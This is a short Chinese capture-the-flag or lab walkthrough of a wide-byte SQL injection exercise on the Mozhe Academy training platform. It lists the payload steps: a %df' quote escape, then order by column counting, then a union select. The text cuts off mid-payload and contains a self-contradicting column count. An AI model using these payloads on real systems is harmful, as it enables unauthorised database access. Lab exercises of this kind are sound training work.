墨者学院-SQL注入漏洞测试(宽字节)

宽字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/宽字节注入/ 先构造payload:%df'  报错,存在宽字节注入 然后加:%df' oder by 5--+或者%df' order by 5%23(#) 5不报错,6报错,所以只有6个字段,联合查询 id=-1%df' union select 1,2,3,4,5%23,发现3,5回显 id=-1%d
相关文章
相关标签/搜索